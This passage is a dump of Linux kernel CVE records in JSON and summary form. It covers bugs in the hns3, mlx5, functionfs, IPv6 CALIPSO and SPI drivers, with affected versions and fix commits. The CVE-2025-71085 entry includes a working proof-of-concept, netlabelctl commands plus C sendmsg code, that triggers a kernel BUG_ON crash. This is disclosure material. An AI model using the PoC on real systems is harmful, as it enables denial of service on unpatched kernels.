"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:27.482Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c149decd8c18ae6acdd7a6041d74507835cf26e6"
},
{
"url": "https://git.kernel.org/stable/c/bcefdb288eedac96fd2f583298927e9c6c481489"
},
{
"url": "https://git.kernel.org/stable/c/6cd8a2930df850f4600fe8c57d0662b376520281"
},
{
"url": "https://git.kernel.org/stable/c/1956d47a03eb625951e9e070db39fe2590e27510"
},
{
"url": "https://git.kernel.org/stable/c/429f946a7af3fbf08761d218746cd4afa80a7954"
},
{
"url": "https://git.kernel.org/stable/c/62f28d79a6186a602a9d926a2dbb5b12b6867df7"
},
{
"url": "https://git.kernel.org/stable/c/c2a16269742e176fccdd0ef9c016a233491a49ad"
}
],
"title": "net: hns3: using the num_tqps in the vf driver to apply for resources",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71064",
"datePublished": "2026-01-13T15:31:20.503Z",
"dateReserved": "2026-01-13T15:30:19.646Z",
"dateUpdated": "2026-01-19T12:19:27.482Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68790 (GCVE-0-2025-68790)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
net/mlx5: Fix double unregister of HCA_PORTS component
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: Fix double unregister of HCA_PORTS component
Clear hca_devcom_comp in device's private data after unregistering it in
LAG teardown. Otherwise a slightly lagging second pass through
mlx5_unload_one() might try to unregister it again and trip over
use-after-free.
On s390 almost all PCI level recovery events trigger two passes through
mlx5_unload_one() - one through the poll_health() method and one through
mlx5_pci_err_detected() as callback from generic PCI error recovery.
While testing PCI error recovery paths with more kernel debug features
enabled, this issue reproducibly led to kernel panics with the following
call chain:
Unable to handle kernel pointer dereference in virtual kernel address space
Failing address: 6b6b6b6b6b6b6000 TEID: 6b6b6b6b6b6b6803 ESOP-2 FSI
Fault in home space mode while using kernel ASCE.
AS:00000000705c4007 R3:0000000000000024
Oops: 0038 ilc:3 [#1]SMP
CPU: 14 UID: 0 PID: 156 Comm: kmcheck Kdump: loaded Not tainted
6.18.0-20251130.rc7.git0.16131a59cab1.300.fc43.s390x+debug #1 PREEMPT
Krnl PSW : 0404e00180000000 0000020fc86aa1dc (__lock_acquire+0x5c/0x15f0)
R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:2 PM:0 RI:0 EA:3
Krnl GPRS: 0000000000000000 0000020f00000001 6b6b6b6b6b6b6c33 0000000000000000
0000000000000000 0000000000000000 0000000000000001 0000000000000000
0000000000000000 0000020fca28b820 0000000000000000 0000010a1ced8100
0000010a1ced8100 0000020fc9775068 0000018fce14f8b8 0000018fce14f7f8
Krnl Code: 0000020fc86aa1cc: e3b003400004 lg %r11,832
0000020fc86aa1d2: a7840211 brc 8,0000020fc86aa5f4
*0000020fc86aa1d6: c09000df0b25 larl %r9,0000020fca28b820
>0000020fc86aa1dc: d50790002000 clc 0(8,%r9),0(%r2)
0000020fc86aa1e2: a7840209 brc 8,0000020fc86aa5f4
0000020fc86aa1e6: c0e001100401 larl %r14,0000020fca8aa9e8
0000020fc86aa1ec: c01000e25a00 larl %r1,0000020fca2f55ec
0000020fc86aa1f2: a7eb00e8 aghi %r14,232
Call Trace:
__lock_acquire+0x5c/0x15f0
lock_acquire.part.0+0xf8/0x270
lock_acquire+0xb0/0x1b0
down_write+0x5a/0x250
mlx5_detach_device+0x42/0x110 [mlx5_core]
mlx5_unload_one_devl_locked+0x50/0xc0 [mlx5_core]
mlx5_unload_one+0x42/0x60 [mlx5_core]
mlx5_pci_err_detected+0x94/0x150 [mlx5_core]
zpci_event_attempt_error_recovery+0xcc/0x388
Severity
No CVSS data available.
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d2495f529d60e8e8c43e6ad524089c38b8be7bc4",
"status": "affected",
"version": "5a977b5833b7a261bfa6094595ffa73c1071588c",
"versionType": "git"
},
{
"lessThan": "6a107cfe9c99a079e578a4c5eb70038101a3599f",
"status": "affected",
"version": "5a977b5833b7a261bfa6094595ffa73c1071588c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.18"
},
{
"lessThan": "6.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix double unregister of HCA_PORTS component\n\nClear hca_devcom_comp in device\u0027s private data after unregistering it in\nLAG teardown. Otherwise a slightly lagging second pass through\nmlx5_unload_one() might try to unregister it again and trip over\nuse-after-free.\n\nOn s390 almost all PCI level recovery events trigger two passes through\nmxl5_unload_one() - one through the poll_health() method and one through\nmlx5_pci_err_detected() as callback from generic PCI error recovery.\nWhile testing PCI error recovery paths with more kernel debug features\nenabled, this issue reproducibly led to kernel panics with the following\ncall chain:\n\n Unable to handle kernel pointer dereference in virtual kernel address space\n Failing address: 6b6b6b6b6b6b6000 TEID: 6b6b6b6b6b6b6803 ESOP-2 FSI\n Fault in home space mode while using kernel ASCE.\n AS:00000000705c4007 R3:0000000000000024\n Oops: 0038 ilc:3 [#1]SMP\n\n CPU: 14 UID: 0 PID: 156 Comm: kmcheck Kdump: loaded Not tainted\n 6.18.0-20251130.rc7.git0.16131a59cab1.300.fc43.s390x+debug #1 PREEMPT\n\n Krnl PSW : 0404e00180000000 0000020fc86aa1dc (__lock_acquire+0x5c/0x15f0)\n R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:2 PM:0 RI:0 EA:3\n Krnl GPRS: 0000000000000000 0000020f00000001 6b6b6b6b6b6b6c33 0000000000000000\n 0000000000000000 0000000000000000 0000000000000001 0000000000000000\n 0000000000000000 0000020fca28b820 0000000000000000 0000010a1ced8100\n 0000010a1ced8100 0000020fc9775068 0000018fce14f8b8 0000018fce14f7f8\n Krnl Code: 0000020fc86aa1cc: e3b003400004 lg %r11,832\n 0000020fc86aa1d2: a7840211 brc 8,0000020fc86aa5f4\n *0000020fc86aa1d6: c09000df0b25 larl %r9,0000020fca28b820\n \u003e0000020fc86aa1dc: d50790002000 clc 0(8,%r9),0(%r2)\n 0000020fc86aa1e2: a7840209 brc 8,0000020fc86aa5f4\n 0000020fc86aa1e6: c0e001100401 larl %r14,0000020fca8aa9e8\n 0000020fc86aa1ec: c01000e25a00 larl %r1,0000020fca2f55ec\n 
0000020fc86aa1f2: a7eb00e8 aghi %r14,232\n\n Call Trace:\n __lock_acquire+0x5c/0x15f0\n lock_acquire.part.0+0xf8/0x270\n lock_acquire+0xb0/0x1b0\n down_write+0x5a/0x250\n mlx5_detach_device+0x42/0x110 [mlx5_core]\n mlx5_unload_one_devl_locked+0x50/0xc0 [mlx5_core]\n mlx5_unload_one+0x42/0x60 [mlx5_core]\n mlx5_pci_err_detected+0x94/0x150 [mlx5_core]\n zpci_event_attempt_error_recovery+0xcc/0x388"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:02.907Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d2495f529d60e8e8c43e6ad524089c38b8be7bc4"
},
{
"url": "https://git.kernel.org/stable/c/6a107cfe9c99a079e578a4c5eb70038101a3599f"
}
],
"title": "net/mlx5: Fix double unregister of HCA_PORTS component",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68790",
"datePublished": "2026-01-13T15:29:02.907Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-13T15:29:02.907Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71074 (GCVE-0-2025-71074)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-23 10:29
Title
functionfs: fix the open/removal races
Summary
In the Linux kernel, the following vulnerability has been resolved:
functionfs: fix the open/removal races
ffs_epfile_open() can race with removal, ending up with file->private_data
pointing to freed object.
There is a total count of opened files on functionfs (both ep0 and
dynamic ones) and when it hits zero, dynamic files get removed.
Unfortunately, that removal can happen while another thread is
in ffs_epfile_open(), but has not incremented the count yet.
In that case open will succeed, leaving us with UAF on any subsequent
read() or write().
The root cause is that ffs->opened is misused; atomic_dec_and_test() vs.
atomic_add_return() is not a good idea, when object remains visible all
along.
To untangle that
* serialize openers on ffs->mutex (both for ep0 and for dynamic files)
* have dynamic ones use atomic_inc_not_zero() and fail if we had zero ->opened; in that case the file we are opening is doomed.
* have the inodes of dynamic files marked on removal (from the callback of simple_recursive_removal()) - clear ->i_private there.
* have open of dynamic ones verify they hadn't been already removed, along with checking that state is FFS_ACTIVE.
Severity
No CVSS data available.
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_fs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e5bf5ee266633cb18fff6f98f0b7d59a62819eee",
"status": "affected",
"version": "ddf8abd2599491cbad959c700b90ba72a5dce8d0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_fs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfunctionfs: fix the open/removal races\n\nffs_epfile_open() can race with removal, ending up with file-\u003eprivate_data\npointing to freed object.\n\nThere is a total count of opened files on functionfs (both ep0 and\ndynamic ones) and when it hits zero, dynamic files get removed.\nUnfortunately, that removal can happen while another thread is\nin ffs_epfile_open(), but has not incremented the count yet.\nIn that case open will succeed, leaving us with UAF on any subsequent\nread() or write().\n\nThe root cause is that ffs-\u003eopened is misused; atomic_dec_and_test() vs.\natomic_add_return() is not a good idea, when object remains visible all\nalong.\n\nTo untangle that\n\t* serialize openers on ffs-\u003emutex (both for ep0 and for dynamic files)\n\t* have dynamic ones use atomic_inc_not_zero() and fail if we had\nzero -\u003eopened; in that case the file we are opening is doomed.\n\t* have the inodes of dynamic files marked on removal (from the\ncallback of simple_recursive_removal()) - clear -\u003ei_private there.\n\t* have open of dynamic ones verify they hadn\u0027t been already removed,\nalong with checking that state is FFS_ACTIVE."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-23T10:29:39.189Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e5bf5ee266633cb18fff6f98f0b7d59a62819eee"
}
],
"title": "functionfs: fix the open/removal races",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71074",
"datePublished": "2026-01-13T15:31:27.413Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-23T10:29:39.189Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71085 (GCVE-0-2025-71085)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().
This bug is triggered as part of the calipso_skbuff_setattr()
routine when skb_cow() is passed headroom > INT_MAX
(i.e. (int)(skb_headroom(skb) + len_delta) < 0).
The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta = headroom - skb_headroom(skb) is never negative, otherwise
we will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.
Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.
PoC:
Using `netlabelctl` tool:
netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7
Then run the following PoC:
int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
// setup msghdr
int cmsg_size = 2;
int cmsg_len = 0x60;
struct msghdr msg;
struct sockaddr_in6 dest_addr;
struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
sizeof(struct cmsghdr) + cmsg_len);
msg.msg_name = &dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = NULL;
msg.msg_iovlen = 0;
msg.msg_control = cmsg;
msg.msg_controllen = cmsg_len;
msg.msg_flags = 0;
// setup sockaddr
dest_addr.sin6_family = AF_INET6;
dest_addr.sin6_port = htons(31337);
dest_addr.sin6_flowinfo = htonl(31337);
dest_addr.sin6_addr = in6addr_loopback;
dest_addr.sin6_scope_id = 31337;
// setup cmsghdr
cmsg->cmsg_len = cmsg_len;
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_HOPOPTS;
char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80
sendmsg(fd, &msg, 0);
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 86f365897068d09418488165a68b23cb5baa37f2 (git) |
| Linux | Linux | Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 6b7522424529556c9cbc15e15e7bd4eeae310910 (git) |
| Linux | Linux | Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 2bb759062efa188ea5d07242a43e5aa5464bbae1 (git) |
| Linux | Linux | Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < c53aa6a5086f03f19564096ee084a202a8c738c0 (git) |
| Linux | Linux | Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < bf3709738d8a8cc6fa275773170c5c29511a0b24 (git) |
| Linux | Linux | Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 73744ad5696dce0e0f43872aba8de6a83d6ad570 (git) |
| Linux | Linux | Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 58fc7342b529803d3c221101102fe913df7adb83 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "86f365897068d09418488165a68b23cb5baa37f2",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "6b7522424529556c9cbc15e15e7bd4eeae310910",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "2bb759062efa188ea5d07242a43e5aa5464bbae1",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "c53aa6a5086f03f19564096ee084a202a8c738c0",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "bf3709738d8a8cc6fa275773170c5c29511a0b24",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "73744ad5696dce0e0f43872aba8de6a83d6ad570",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "58fc7342b529803d3c221101102fe913df7adb83",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:48.500Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2"
},
{
"url": "https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910"
},
{
"url": "https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1"
},
{
"url": "https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0"
},
{
"url": "https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24"
},
{
"url": "https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570"
},
{
"url": "https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83"
}
],
"title": "ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71085",
"datePublished": "2026-01-13T15:34:48.324Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:48.500Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68773 (GCVE-0-2025-68773)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
spi: fsl-cpm: Check length parity before switching to 16 bit mode
Summary
In the Linux kernel, the following vulnerability has been resolved:
spi: fsl-cpm: Check length parity before switching to 16 bit mode
Commit fc96ec826bce ("spi: fsl-cpm: Use 16 bit mode for large transfers
with even size") failed to make sure that the size is really even
before switching to 16 bit mode. Until recently the problem went
unnoticed because kernfs uses a pre-allocated bounce buffer of size
PAGE_SIZE for reading EEPROM.
But commit 8ad6249c51d0 ("eeprom: at25: convert to spi-mem API")
introduced an additional dynamically allocated bounce buffer whose size
is exactly the size of the transfer, leading to a buffer overrun in
the fsl-cpm driver when that size is odd.
Add the missing length parity verification and remain in 8 bit mode
when the length is not even.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 60afe299bb541a928ba39bcb4ae8d3e428d1c5a5 , < c8f1d35076b78df61ace737e41cc1f4b7b63236c (git) |
| Linux | Linux | Affected: 4badd33929c05ed314794b95f1af1308f7222be8 , < 9c34a4a2ead00979d203a8c16bea87f0ef5291d8 (git) |
| Linux | Linux | Affected: 7f6738e003b364783f3019fdf6e7645bc8dd1643 , < 837a23a11e0f734f096c7c7b0778d0e625e3dc87 (git) |
| Linux | Linux | Affected: fc96ec826bced75cc6b9c07a4ac44bbf651337ab , < 3dd6d01384823e1bd8602873153d6fc4337ac4fe (git) |
| Linux | Linux | Affected: fc96ec826bced75cc6b9c07a4ac44bbf651337ab , < 743cebcbd1b2609ec5057ab474979cef73d1b681 (git) |
| Linux | Linux | Affected: fc96ec826bced75cc6b9c07a4ac44bbf651337ab , < be0b613198e6bfa104ad520397cab82ad3ec1771 (git) |
| Linux | Linux | Affected: fc96ec826bced75cc6b9c07a4ac44bbf651337ab , < 1417927df8049a0194933861e9b098669a95c762 (git) |
| Linux | Linux | Affected: 42c04316d9275ec267d36e5e9064cd56c9884148 (git) |
| Linux | Linux | Affected: dc120f2d35b030390a2bc0f94dd5f37e900cae91 (git) |
| Linux | Linux | Affected: b558275c1b040f0e5aa56c862241f9212b6118c3 (git) |
| Linux | Linux | Affected: b9d9e8856f1c83e4277403f9b4c369b322ebcb12 (git) |
| Linux | Linux | Affected: 36a6d0f66c874666caf4e8be155b1be30f6231be (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-fsl-spi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c8f1d35076b78df61ace737e41cc1f4b7b63236c",
"status": "affected",
"version": "60afe299bb541a928ba39bcb4ae8d3e428d1c5a5",
"versionType": "git"
},
{
"lessThan": "9c34a4a2ead00979d203a8c16bea87f0ef5291d8",
"status": "affected",
